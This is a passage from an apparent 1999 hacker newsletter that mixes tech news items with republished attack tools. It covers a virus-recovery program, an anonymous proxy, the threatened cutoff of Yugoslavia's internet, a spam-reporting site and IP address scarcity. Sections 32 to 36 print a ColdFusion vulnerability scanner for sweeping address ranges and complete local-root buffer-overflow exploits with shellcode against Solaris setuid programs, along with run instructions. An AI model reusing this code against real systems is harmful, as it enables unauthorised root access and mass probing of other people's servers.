worked when I tried it out. Most of the data on the disk was recovered,"
he said.

Sharif tried it on several other computers at Dhaka, and it worked there, too, recovering data in minutes.

"If your machine uses FAT [File Allocation Table], MRECOVER will recover all the data on the disk within
three to four minutes. But if your computer uses FAT 16, then it will recover all data after the first partition,
limiting the recovery to between 40 and 60 percent,"
Sharif said. He added that the antidote doesn't work on hard
drives with a capacity of 8G bytes or more.

The program is free to use and has been posted on the Web at http://members.xoom.com/monirdomain for
anybody who wants to download it. A new and improved version for machines that use FAT 16 will be ready
within days and followed by one for large-capacity hard drives. Sharif said he has received 3,000 hits and
innumerable e-mail messages since he put MRECOVER on the Internet May 5, but the inventor
doesn't see any commercial gain from the program.

Sharif, who was born in England and spent his early childhood there, graduates next June. He said his
ambition is to head to the U.S. for higher studies.

"I would like to go to the U.S. to do a master's in computer science. But it's unlikely that I will specialize in
antivirus programs. I still find general programming much more interesting,"
he said.

@HWA

29.0 Anonymous web browsing from 303.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

Anonymous Web Surfing


Contributed by Netmask
303.org is now offering anonymous web surfing. By setting your browser to use 303.org as the http
proxy server, and port 1050. This server will forward the type of client you use, but not the IP
address. More info available at 303.org

http://www.303.org

@HWA

30.0 Yugoslavia Offline?
~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

YUGOSLAVIA OFFLINE
by BHZ, Wednesday 12th May 1999 on 9:30 pm CET
It looks like Yugoslavia's Internet users will be offline for a long time. As stated on
www.beograd.com "We have reliable information that the US Government ordered
shut down of satellite feeds for Internet customers in Yugoslavia, as a result of NATO
air war against this country. This action might be taken as soon as later tonight or
tomorrow (May 12 or 13, 1999)"
. Press release below.


May 12, 1999


US shuts down Yugoslav Internet - For immediate
release

BELGRADE, MAY 12 - We have reliable information
that the US Government ordered shut down of satellite
feeds for Internet customers in Yugoslavia, as a result
of NATO air war against this country.
This action might be taken as soon as later tonight or
tomorrow (May 12 or 13, 1999).

This is a flagrant violation of commercial contracts
with Yugoslav ISPs, as well as an attack on freedom of
the Internet.

A Web site in protest of these actions should be up
shortly. We will supply you with the URL. In the
meantime, please be so kind to inform as many people
as possible about this tragic event for the Internet
community in Yugoslavia and Europe.

BeoNET
Belgrade, Yugoslavia


May 13th

Contributed by cyberdiva

From Beograd.com:


16:50 According to the last information, "LORAL ORION" has given up, until further notice,
disconnecting Yugoslavia from Internet, because of the protests from all around the world
that followed the announcement


15:55 FONET - One of the biggest US communication satellites of the firm "LORAL ORION" has
informed Belgrade provider "Informatika" last night that because of "vis major" they wiould
have to stop Internet emitting toward all Yugoslav providers who are linked to providers
in USA. "This decision is the result of the executive order of the President of USA, Bill
Clinton, banning emitting of all services from USA into Federal Republic of Yugoslavia
(Serbia and Monte Negro)"
, says the message of "LORAL ORION" to the general Director of
"Informatika", Slobodan Sreckovic. "In accordance with that, LORAL ORION will, starting from
May 12, 1999, stop its services"
, it is said at the end of the statement. On Thursday, May 13,
in morning hours, "Informatika" confirmed to Fonet this has not
happened yet, but they are expecting to be disconnected from USA Internet satellite service toward
Yugoslavia any minute/hour now".


--diva


May 14th


RE: Internet connection in Yugoslavia


Now the mainstream media has picked it up and although Loral for the time has relented, it looks like
the Clinton administration is still considering it.


<http://www.foxnews.com/world/051499/kosovo_internet.sml>
Clinton Deciding Whether to Cut Yugoslavia Internet Access


I don't have to remind you there has been no formal declaration of WAR by the United States.


It makes me wonder how are private companies going to be able to secure global business if underneath
it all, they are forced to do the political bidding of the United States against their own customers...


Hacker News Network is doing an expose on the story going up today as well.


Thanks for hearing me out...


--diva



FoxNews;

Clinton Deciding Whether to Cut
Yugoslavia Internet Access
8.08 a.m. ET (1208 GMT) May 14, 1999


WASHINGTON Confronted with a dilemma of war in the information age, the Clinton administration is trying to
decide whether its trade embargo extends to Internet access for some of Yugoslavia's citizens.

Loral Space and Communications Ltd. of New York said it may be forced to cut transmissions into Yugoslavia from
one of its satellites, which serves at least two of the country's major Internet providers.

"
We're still not clear on this whole thing," said Jeannette Colnan, a spokeswoman for Loral Space.

President Clinton issued an executive order two weeks ago banning U.S. companies from selling or supplying to
Yugoslavia "
any goods, software, technology or services," although the order allows for the "special consideration of
the humanitarian needs of refugees."

The National Security Council said information services are generally considered exempt from trade embargoes, but that
electronic commerce is affected. The Internet performs both functions.

"
We'll need to inquire further about the appropriate applications of the law," said David Leavy, a spokesman for
the security council.

Loral Space said Thursday that it was discussing its obligations under the embargo with the Treasury
Department, which didn't respond to requests for comment.

Experts said any move by the United States to limit civilian use of the Internet would be unprecedented.

NATO has already attacked Serbian broadcast stations to stem what it describes as propaganda, and Serbs have
established an extraordinary network on the Internet criticizing ongoing air strikes.

But the Internet also serves as a conduit for civilians to receive unadulterated news reports about NATO efforts.

"
The Internet remains at this point one of the major sources inside Yugoslavia for
objective news reporting about the war," said Jim Dempsey of the
Washington-based Center for Democracy and Technology.

Word of the threat to shut down Internet access to at least parts of Yugoslavia
spread quickly across the global network, where it was condemned in some e-mail
messages and online discussion groups.

"
To put it bluntly, we somehow got used to air-raid sirens, bombings and threats of
invasion, but we don't know how we're going to survive without the Internet," said
Alex Krstanovic, co-founder of Beonet, one of the Internet providers in Yugoslavia.

But some argued that access should be cut off.

"
Continuing to provide these services would be kind of like giving aid to the enemy,"
one person wrote.

The possible loss of Internet access also illustrated the fragility of the computer
network and the importance assigned to it internationally.

Computer traffic in Yugoslavia uses both satellite and traditional land-based
telephone lines, but the loss of the Loral satellite could dramatically reduce the
Internet bandwidth available to citizens there, causing slow connections or even
blackouts.

Web sites reliant on the Loral satellite continued to be accessible overnight
Thursday, and there were no substantiated reports of anyone unable to retrieve
information from outside the country using the Internet.

A spokeswoman at the organization that registers Web addresses ending with the
country's "
yu" suffix said that she was familiar with the reports but that there had
been no problems yet.





@HWA

31.0 Spam Recycling site deals with spammers for you
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Who75

http://www.maximumpcmag.com/inside_sources/99.5/99.5.11.phtml

Site Offers To ''Recycle'' Spam

If you feel guilty about tossing an aluminum can in the garbage, spamrecycle.com
may be the site for you.

The site is offering to "
recycle" spam you send the site and submit it for complaint
to the proper authorities. Although it may sound like a shell company spam artists
use to farm more e-mail accounts, spamrecycle.com is supported by the Coalition
Against Unsolicited Commercial E-mail.

Spamrecycle.com officials said the site was created to help people fight spam. Many spam perpetrators
give e-mail addresses that offer to remove the spam victim from further unsolicated email.
Unfortunately, in many cases, the e-mail only validates the victim's e-mail address, causing more spam
to pour in.

Spamrecycle.com is sponsored by CDnow.com, which is giving people who recycle their spam a $5
coupon towards purchases from the site.

@HWA


32.0 quickie.c by Bronc Buster, a Cold Fusion vulnerability scanner
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm Security
http://www.genocide2600.com/~tattooman/new.shtml



/*
Quickie Coldfusion exploit finder v1.0

After seeing all the super lame hacks by groups desperatly seeking media wh0rage, like
JPs new favorite group, Team spl0it, and all the lame crap they were using, I deciced
to help them in their quest to look lame. Most of the 'tools' these people were
releasing were nothing more then modified versions of my cgiscanner (cgiscan.c), so
here is a newly coded, faster scanner for them to use and rip off. If I find this code,
like the rest of my code, on JPs code site, with my name cleaverly removed, I am going
to go take a shit on the hood of his car.

This should also give McIntyre and Jericho some more sites to put in their hacked site
archive on attrition.org that JP can rip off to. They have already shit on his car.

This scanner scans an entire class C address, and does it with no bull. Enter the
starting IP address, then the one you want to to stop on, and it will scan each box for
the 3 parts of the bug.

complies on HP-UX, Linux, *BSD

to compile:
luser$ gcc quickie.c -o quickie

to run:
luser$ ./quickie 123.123.123.2 123.123.123.254 >> somelog &

coded by Bronc Buster
May 1999

*/


#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
/* sets the timeout for connect() - you can change it if you want */
#define TOUT 2

/*****************************************************/
/* begin eLe3t prototypes */
/*****************************************************/

void phalse(int signo);
int connect_time(int sockfd, struct sockaddr *saptr, int salen, int nsec);
void clean(char b[1024]);

/*****************************************************/
/* end eLe3t prototypes */
/*****************************************************/

int main(int argc, char **argv)
{

char *temp;
char *ip_ptr;
char buff[1024]; /* who cares, we only want to HTTP header */
int f1,f2,f3,f4; /* f1.f2.f3.f4 when we disassemble first IP */
int l1,l2,l3,l4; /* l1.l2.l3.l4 when we disassemble last IP */
int i, tmp, n, lame;
int sock;
struct sockaddr_in target;
char *coldf[4];
char *dis[4];

/* this is just for a pretty print */
dis[1] = "
openfile.cfm";
dis[2] = "
exprcalc.cfm";
dis[3] = "
displayopenedfile.cfm";

/* checks for coldfusion bugs */
coldf[1] = "
GET /cfdocs/expelval/openfile.cfm HTTP/1.0\n\n";
coldf[2] = "
GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0\n\n";
coldf[3] = "
GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0\n\n";


if(argc<2) exit(printf("
\nUsage: %s start_ip ending_ip\n",argv[0]));

printf("
\n** A fast coldfusion exploit finder **");
printf("
\ncoded by Bronc Buster - May 99\n");

/* parse ripped from HoGs HeaD domain scanner with a little */
/* modification - works good */
/* parse first ip - sorry no error checking */
temp=argv[1];
ip_ptr=(char *)strtok(temp,"
."); /* get first field and look for . */
f1=atoi(ip_ptr);
ip_ptr=(char *)strtok(NULL,"
."); /* null pointer set, get next field */
f2=atoi(ip_ptr);
ip_ptr=(char *)strtok(NULL,"
."); /* null pointer set, get next field */
f3=atoi(ip_ptr);
ip_ptr=(char *)strtok(NULL,"
."); /* null pointer set, get next field */
f4=atoi(ip_ptr);

/* parse second ip */
temp=argv[2];
ip_ptr=(char *)strtok(temp,"
."); /* get first field and look for . */
l1=atoi(ip_ptr);
ip_ptr=(char *)strtok(NULL,"
."); /* null pointer set, get next field */
l2=atoi(ip_ptr);
ip_ptr=(char *)strtok(NULL,"
."); /* null pointer set, get next field */
l3=atoi(ip_ptr);
ip_ptr=(char *)strtok(NULL,"
."); /* null pointer set, get next field */
l4=atoi(ip_ptr);
/* end parsing */

/* class C range checking - morons 'might' use the - hehehe */
if(f4<2 || l4>254)
exit(printf("
IP Numbers out of range\n"));

/* class C only - anyone with a brain can make */
/* this scan class B or A nets - wow kidiez! */
for (i=f4;i<=l4;i++)
{
/* reconstruct the IP into a string */
sprintf(temp,"
%d.%d.%d.%d",f1,f2,f3,i);

bzero(&target,sizeof(target));
target.sin_addr.s_addr=inet_addr(temp);
target.sin_family=AF_INET;
target.sin_port=htons(80);

/* ok, so this is a lame loop */
for(lame=1;lame;lame--)
{
printf("
\nChecking %s:",temp);

/* check for all 3 before we jump for joy */
for(n=1;n<4;n++)
{
sock=socket(AF_INET,SOCK_STREAM,0);
if(sock<0)
exit(printf("
Error getting socket - socket()\n"));
if(connect_time(sock,(struct sockaddr *)&target,sizeof(target),TOUT)==-1)
{
close(sock);
printf("
\n no HTTPD responce");
}
else
{
printf("
\n checking for %s - ",dis[n]);
send(sock,coldf[n],strlen(coldf[n]),0);
recv(sock, buff, sizeof(buff),0);
if(strstr(buff,"
200"))
{
close(sock);
clean(buff);
printf("
FOUND",dis[n]);
}
else
{
close(sock);
clean(buff);
printf("
not found",dis[n]);
}
}
}
}
}

printf("
\n\nScan finished!\n");
printf("
Have fun kiddies!\n");
return 0;

}

/**************************************************************/
/* eLe3t functions */
/**************************************************************/
/* fake return function for connect_time() */
void phalse(int signo)
{
return;
}

/* connect with timeout - for speed!@$(*%^@ */
int connect_time(int sockfd, struct sockaddr *saptr, int salen, int nsec)
{
int s;
alarm(0);
signal(SIGALRM,phalse);
alarm(nsec);

if((s=connect(sockfd,(struct sockaddr *)saptr,salen))<0)
{
close(sockfd);
if(errno==EINTR);
errno=ETIMEDOUT;
}
alarm(0);
signal(SIGALRM, SIG_DFL);
return (s);
}

/* clean out buffer so we don't get fake readings */
void clean(char b[1024])
{
int i;
for(i=0;i<=strlen(b);i++)
b[i]=NULL;
}

/* EOF */


@HWA

33.0 sdtcm_convert local root overflow exploit for Sparc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security
http://www.genocide2600.com/~tattooman/new.shtml



/*=============================================================================
sdtcm_convert Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)

[usage]
% gcc ex_sdtcm_convert.c (This example program)
% a.out
If no response, hit ctrl+c
#
=============================================================================
*/

#define ADJUST 2
#define OFFSET1 4000
#define LENGTH1 260
#define OFFSET2 6000
#define LENGTH2 1000
#define OFFSET3 6000+16*30

#define NOP 0xa61cc013

char exploit_code[] =
"
\x82\x10\x20\x17\x91\xd0\x20\x08"
"
\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"
\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"
\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"
\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"
\x82\x10\x20\x3b\x91\xd4\xff\xff";

unsigned long get_sp(void)
{
__asm__("
mov %sp,%i0 \n");
}

unsigned long ret_adr;
int i;

main()
{
static char x[11000];

memset(x,'a',10000);
ret_adr=get_sp()-6300;
for (i = 0; i < 5000 ; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
ret_adr=get_sp() - 10200;
if ((ret_adr & 0xff )==0) ret_adr+=4;
printf("
%lx\n",ret_adr);
for (i = OFFSET1+ADJUST; i < OFFSET1+LENGTH1 ; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
for (i = OFFSET2+ADJUST; i < OFFSET2+LENGTH2 ; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) x[OFFSET3+ADJUST+i]=exploit_code[i];
x[10000]=0;
execl("
/usr/dt/bin/sdtcm_convert", "sdtcm_convert", "-d",x,"test",(char *) 0);
}


@HWA


34.0 lpset local root overflow exploit for x86
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security
http://www.genocide2600.com/~tattooman/new.shtml



/*=============================================================================
ex_lpset.c Overflow Exploits( for Intel x86 Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
[usage]
% gcc ex_lpset.c (This example program)
% a.out
#
=============================================================================
*/

#define ADJUST 3
#define OFFSET 0x3b88
#define STARTADR 700
#define ENDADR 1200
#define EX_STADR 8000
#define BUFSIZE 22000

#define NOP 0x90

unsigned long ret_adr;
int i;

char exploit_code[] =
"
\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"
\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff\x55"
"
\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33\xc0"
"
\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e"
"
\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3"
"
\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46\x08"
"
\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01\xe8"
"
\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";

unsigned long get_sp(void)
{
__asm__("
movl %esp,%eax ");
}

static char x[BUFSIZE];

main(int argc, char **argv)
{
memset(x,NOP,18000);
ret_adr=get_sp()-OFFSET;
printf("
Jumping Address = 0x%lx\n",ret_adr);
for (i = ADJUST+STARTADR; i<ENDADR ; i+=4){
x[i+2]=ret_adr & 0xff;
x[i+3]=(ret_adr >> 8 ) &0xff;
x[i+0]=(ret_adr >> 16 ) &0xff;
x[i+1]=(ret_adr >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) x[i+EX_STADR]=exploit_code[i];
x[5000]='=';
x[18000]=0;
execl("
/usr/bin/lpset","lpset","-n","xfn","-a",x,"lpcol1",(char *) 0);
}


@HWA

35.0 admintool local root exploit for solaris x86 machines
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From PacketStorm Security
http://www.genocide2600.com/~tattooman/new.shtml

/*=============================================================================
admintool Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
[usage]
% setenv DISPLAY yourdisplay (ex. setenv DISPLAY 192.168.0.100:0.0)
% gcc ex_admintool.c (This example program)
% a.out
( [Browse] -> [Software] -> [Edit] -> [Add] -> [Harddisk]
-> Directory: /tmp -> [Ok] )
#

In /tmp/EXP directory, the temp files are made, please remove it.
=============================================================================
*/

#include <stdio.h>


#define ADJUST1 2
#define ADJUST2 1
#define BUFSIZE1 1000
#define BUFSIZE2 800
#define OFFSET 3600
#define OFFSET2 400

#define PKGDIR "
mkdir /tmp/EXP"
#define PKGINFO "
/tmp/EXP/pkginfo"
#define PKGMAP "
/tmp/EXP/pkgmap"

#define NOP 0xa61cc013

char exploit_code[] =
"
\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"
\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"
\x94\x10\x20\x10\x94\x22\xa0\x10"
"
\x9c\x03\xa0\x14"
"
\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"
\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"
\x91\xd0\x20\x08"
;

unsigned long get_sp(void)
{
__asm__("
mov %sp,%i0 \n");
}

unsigned long ret_adr;
static char x[500000];
FILE *fp;
int i;

main()
{
system(PKGDIR);
putenv("
LANG=");
if ((fp=fopen(PKGMAP,"
wb"))==NULL){
printf("
Can not write '%s'\n",PKGMAP);
exit(1);
}
fclose(fp);

if ((fp=fopen(PKGINFO,"
wb"))==NULL){
printf("
Can not write '%s'\n",PKGINFO);
exit(1);
}
fprintf(fp,"
PKG=");

ret_adr=get_sp()-OFFSET;
while ((ret_adr & 0xff000000) == 0 ||
(ret_adr & 0x00ff0000) == 0 ||
(ret_adr & 0x0000ff00) == 0 ||
(ret_adr & 0x000000ff) == 0)
ret_adr += 4;

printf("
Jumping address = %lx\n",ret_adr);
memset(x,'a',4);
for (i = ADJUST1; i < 1000; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >>8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
x[BUFSIZE1]=0;
fputs(x,fp);
fprintf(fp,"
\n");

fprintf(fp,"
NAME=");
memset(x,'a',4);
for (i = ADJUST2; i < BUFSIZE2; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0; i<strlen(exploit_code); i++)
x[i+ADJUST2+OFFSET2]=exploit_code[i];
x[BUFSIZE2]=0;
fputs(x,fp);
fprintf(fp,"
\n");

fprintf(fp,"
VERSION=1.00\n");
fprintf(fp,"
ARCH=sparc\n");
fprintf(fp,"
CLASSES=none\n");
fprintf(fp,"
CATEGORY=application\n");
fprintf(fp,"
PSTAMP=990721\n");
fprintf(fp,"
BASEDIR=/\n");
fclose(fp);
system("
admintool");
}

@HWA

36.0 dtprintinfo buffer overflow exploit for solarix x86 machines..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Mon, 10 May 1999 02:12:29 JST
From: "
UNYUN@ShadowPenguin" <yuuzy@USA.NET>
To: BUGTRAQ@netspace.org
Subject: Solaris2.6,2.7 dtprintinfo exploits

Hello.

"
dtprintinfo" is suid program, the stack buffer can be overflowed by '-p'
option. I made an exploit program that can get root for Intel edition of
Solaris2.6 and Solaris 2.7.
Please test it.
If you test this program, please set DISPLAY environment correctly
before execution.

/*========================================================================
ex_dtprintinfo.c Overflow Exploits( for Intel x86 Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
========================================================================
*/
static char x[1000];
#define ADJUST 0
#define STARTADR 621
#define BUFSIZE 900
#define NOP 0x90
unsigned long ret_adr;
int i;
char exploit_code[] =
"
\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"
\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"
\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"
\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"
\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"
\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"
\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"
\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"
\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"
\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";

unsigned long get_sp(void)
{
__asm__("
movl %esp,%eax ");
}
main()
{
putenv("
LANG=");
for (i=0;i<BUFSIZE;i++) x[i]=NOP;
for (i=0;i<strlen(exploit_code);i++)
x[STARTADR+i]=exploit_code[i];
ret_adr=get_sp() - 1292 + 148;
for (i = ADJUST; i < 400 ; i+=4){
x[i+0]=ret_adr & 0xff;
x[i+1]=(ret_adr >> 8 ) &0xff;
x[i+2]=(ret_adr >> 16 ) &0xff;
x[i+3]=(ret_adr >> 24 ) &0xff;
}
x[BUFSIZE]=0;
execl("
/usr/dt/bin/dtprintinfo", "dtprintinfo",
"
-p",x,(char *) 0);
}

--------------------------------------------------------------------

Date: Mon, 10 May 1999 13:15:36 JST
From: "
UNYUN@ShadowPenguin" <yuuzy@USA.NET>
To: BUGTRAQ@netspace.org
Subject: Re: [Solaris2.6,2.7 dtprintinfo exploits]

Sorry, I forgot to to write the following things...

Before execution of dtprintinfo exploit, please make a dummy
lpstat command.

for example,

% cat > lpstat
echo "
system for lpprn: server.com"
^D
% chmod 755 lpstat
% setenv PATH .:$PATH
% gcc ex_dtprintinfo.c
% a.out


Following exploit program is for Sparc Solaris.
I tested on Solaris2.6.

/*========================================================================
ex_dtprintinfo.c Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
=========================================================================
*/
#define ADJUST 0
#define OFFSET 1144
#define STARTADR 724
#define BUFSIZE 900
#define NOP 0xa61cc013
static char x[1000];
unsigned long ret_adr;
int i;
char exploit_code[] =
"
\x82\x10\x20\x17\x91\xd0\x20\x08"
"
\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"
\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"
\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"
\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"
\x82\x10\x20\x3b\x91\xd4\xff\xff";

unsigned long get_sp(void)
{
__asm__("
mov %sp,%i0 \n");
}
main()
{
putenv("
LANG=");
for (i = 0; i < ADJUST; i++) x[i]=0x11;
for (i = ADJUST; i < 900; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i];
ret_adr=get_sp()-OFFSET;
printf("
jumping address : %lx\n",ret_adr);
if ((ret_adr & 0xff) ==0 ){
ret_adr -=16;
printf("
New jumping address : %lx\n",ret_adr);
}
for (i = ADJUST; i < 600 ; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
x[BUFSIZE]=0;
execl("
/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p",x,(char *) 0);
}


The Shadow Penguin Security
(http://base.oc.to/skyscraper/byte/551)
UNYUN (unewn4th@usa.net)

@HWA

37.0 Are we running out of IP numbers? how many class c's are left??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Net number system at a crossroads
By Dan Goodin and Courtney Macavinta
Staff Writers, CNET News.com
NEWS.COM
May 12, 1999, 4 a.m. PT
URL: http://www.news.com/SpecialFeatures/0,5,36425,00.html

special feature Alongside the highly public debate over domain names, a little-understood predicament--with
more far-reaching consequences--is confronting the new nonprofit corporation in charge of the Net's
administration.

Forget about "
.com." The critical resource under the Net's hood is numerical addresses, and the Internet
Corporation for Assigned Names and Numbers now is in charge of those, too.

Every online device or computer needs an Internet Protocol (IP) numerical address to connect to the global
network. When the system was being designed, hardly anyone imagined that its 4.2 billion unique addresses
would ever be exhausted. Just a few decades later, however, some in the technical community fear that the rapid
pace of innovation one day may cause the Net to run out of numbers.

Demand for IP numbers is naturally growing due to the Net's evolution as a meeting place and marketplace. Further
draining the IP pool is the aggressive rollout of "
always on" cable Net access and the array of handheld devices
that need dedicated IP numbers.

Currently, most online access providers and companies utilize a small batch of IP addresses by dynamically
assigning the numbers based on demand when people log on to their networks. But with broadband services such as
cable, customers must have their own dedicated number.

"
It's going to come to the point where your TV remote is speaking IP to your TV, and they'll each need an IP
address," said Paul Vixie,
an architect of the Net's address system. Under such a scenario, a typical household could have more than 250 IP
addresses, he added.

In a way the potential shortage of IP addresses is most analogous to the shortage of phone numbers that came about
with the advent of fax machines and cellular phones, which has spurred the addition of new area codes.

And the perceived scarcity of addresses is just the beginning. As more computers connect to the Net, the databases
that map the numbers are growing larger and becoming unwieldy. The ever-increasing size of the network's so-called
routing tables has some Net programmers worried.

"
There's going to be a point when machines can't handle the size," said Kim Hubbard, president of the American
Registry for Internet Numbers, which is responsible for allocating and assigning IP addresses in the Americas.

Although there is hope that a new standard, IP version 6 (IPV6), could help alleviate both problems, the timeline for
a rollout is sketchy--estimates range from the next 5 to 25 years. That's why many in the Net addressing trenches
agree that allocation of these precious resources must meet strict guidelines.

"
There is this constant tension about whose interest is being served," said Tony Rutkowski, principal consultant for
the Next Generation Internet and a founder of the Internet Society. "
It's a combination of how these IP addresses
are allocated and to whom--and that is the rub."

New nonprofit in the middle
And now ICANN, which is mediating a number of other contentious debates, finds itself in the middle of the
long-standing, international struggle over who should hold the key to the IP address treasure chest.

At a public meeting in Berlin later this month, ICANN is expected to take its most definitive step on the issue,
creating an organization to tackle IP addressing.

Since last November, ICANN has been charged with overseeing the Net's technical administration, under a Memorandum Of
Understanding it signed with the Commerce Department. ICANN also has been recognized by more than 25 nations in its new
role.

So far, ICANN's challenges posed by IP numbering have been overshadowed by other topics, such as authorizing new companies
to register domains ending in "
.com" or adding new top-level domains such as ".web" and ".firm." Along with the fact that
domains have been a well-publicized issue, ICANN's leaders also don't see the IP address issue as terribly pressing.

"
We haven't needed to do anything in the way of [IP address] policy yet," said Michael Roberts, ICANN's interim chief
executive. "
There is potential scarcity. The thing to do is get moving on IPV6, which will deploy in an open and fair way
based on reasonable need."

But a failure to adequately tackle a range of problems surrounding IP addresses ultimately could cripple the Net. In fact,
charting a new IP numbering course may prove to be ICANN's most important contribution.

Chain of command gets longer In the past, policy and oversight of IP addresses has been left to the Internet Assigned Numbers
Authority, the government-funded group that designed the numbering system under the leadership of the late Jon Postel. Under
ICANN, the Internet Assigned Numbers Authority still distributes address space to three geographically diverse Regional Internet
Registries (RIRs), which typically hand out the addresses to large end users such as Internet service providers and universities.

ICANN will be operating under the same bottom-line principles that have guided the Internet Assigned Numbers Authority for the
past three years. They call for a system that conserves addresses and routes Internet traffic more efficiently.

The Internet Assigned Numbers Authority's functions may still be in place, but the chain of command is set to be dramatically
altered. Whereas the buck used to stop at Postel, now it will stop at the ICANN board, which ultimately will be advised--and
